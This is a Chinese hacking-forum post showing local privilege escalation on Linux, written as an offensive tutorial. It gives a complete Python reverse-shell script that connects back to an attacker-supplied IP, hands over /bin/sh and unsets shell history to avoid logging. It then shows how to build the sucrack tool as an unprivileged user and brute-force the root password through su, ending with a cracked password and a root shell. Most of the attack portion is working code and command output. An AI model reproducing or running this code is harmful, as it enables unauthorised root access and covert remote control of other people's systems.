切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
225 本地破解 sucrack[复制链接]
发表于 2012-8-25 17:51:15 | 显示全部楼层 |!read_mode!
sucrack是一个多线程的Linux / UNIX本地密码破解工具 通过su本地用户帐户
也就是
su root

  1. root@Dis9Team:~# su brk
  2. brk@Dis9Team:/root$ su root
  3. Password:
  4. root@Dis9Team:~#
复制代码

附送一个可以su操作的反弹脚本

  1. #!/usr/bin/python
  2. import sys
  3. import os
  4. import socket
  5. import pty

  6. shell = "/bin/sh"

  7. def usage(programname):
  8. print "ython connect-back door"
  9. print "Usage: %s <conn_back_ip> <port>" % programname

  10. def main():
  11. if len(sys.argv) !=3:
  12. usage(sys.argv[0])
  13. sys.exit(1)

  14. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

  15. try:
  16. s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
  17. print "[+]Connect OK."
  18. except:
  19. print "[-]Can't connect"
  20. sys.exit(2)

  21. os.dup2(s.fileno(),0)
  22. os.dup2(s.fileno(),1)
  23. os.dup2(s.fileno(),2)
  24. global shell
  25. os.unsetenv("HISTFILE")
  26. os.unsetenv("HISTFILESIZE")
  27. pty.spawn(shell)
  28. s.close()

  29. if __name__ == "__main__":
  30. main()
复制代码

切换到普通用户 不需要ROOT权限编译 如果你在SHELL中注意看当前用户的位置 ,SHELL中建议brk@Dis9Team:~$ ./configure –prefix=/home/brk/su编译到TMP目录

  1. brk@Dis9Team:~$ wget http://www.leidecker.info/projects/sucrack/sucrack-1.2.3.tar.gz
  2. brk@Dis9Team:~$ tar xf sucrack-1.2.3.tar.gz
  3. brk@Dis9Team:~$ cd sucrack-1.2.3/
  4. brk@Dis9Team:~$ ./configure --prefix=/home/brk/su
  5. brk@Dis9Team:~$ make
  6. brk@Dis9Team:~$ make install
  7. brk@Dis9Team:~$ cd su/bin/
  8. brk@Dis9Team:~/su/bin$ ./sucrack -h
  9. sucrack 1.2.3 (LINUX) - the su cracker
  10. Copyright (C) 2006  Nico Leidecker; nfl@portcullis-security.com

  11. Usage: ./sucrack [-char] [-w num] [-b size] [-s sec] [-u user] [-l rules] wordlist

  12. The word list can either be an existing file or stdin. In that case, use '-' instead of a file name

  13. Options:
  14.    h       : print this message
  15.    a       : ansi escape codes not available.
  16.              Use the --enable-statistics configure flag.
  17.    s sec   : statistics display interval not available.
  18.              Use the --enable-statistics configure flag.
  19.    c       : only print statistics if a key other than `q' is pressed. (default)
  20.    r       : enable rewriter
  21.    w num   : number of worker threads running with
  22.    b size  : size of word list buffer
  23.    u user  : user account to su to
  24.    l rules : specify rewriting rules; rules can be:
  25.                A = all characters upper case
  26.                F = first character upper case
  27.                L = last character upper case
  28.                a = all characters lower case
  29.                f = first character lower case
  30.                l = last character lower case
  31.                D = prepend digit
  32.                d = append digit
  33.                e = 1337 characters
  34.                x = all rules

  35. Environment Variables:
  36.    SUCRACK_SU_PATH      : The path to su (usually /bin/su or /usr/bin/su)

  37.    SUCRACK_AUTH_FAILURE : The message su returns on an authentication
  38.                           failure (like "su: Authentication failure" or "su: Sorry")
  39.    SUCRACK_AUTH_SUCCESS : The message that indicates an authentication
  40.                           success. This message must not be a password
  41.                           listed in the wordlist (default is "SUCRACK_SUCCESS")

  42. Example:
  43.    export SUCRACK_AUTH_SUCCESS="sucrack_says_hello"
  44.    ./sucrack -a -w 20 -s 10 -u root -rl AFLafld dict.txt
  45. brk@Dis9Team:~/su/bin$
复制代码

-u 指定用户 -w 多线程运行

下面破解root密码


  1. brk@Dis9Team:~/su/bin$ ./sucrack -w 20 -u root /tmp/passwd.txt
  2. password is: 123456
  3. brk@Dis9Team:~/su/bin$
复制代码
测试

  1. brk@Dis9Team:~/su/bin$ su root
  2. Password:
  3. root@Dis9Team:/home/brk/su/bin#
复制代码





操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:34

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部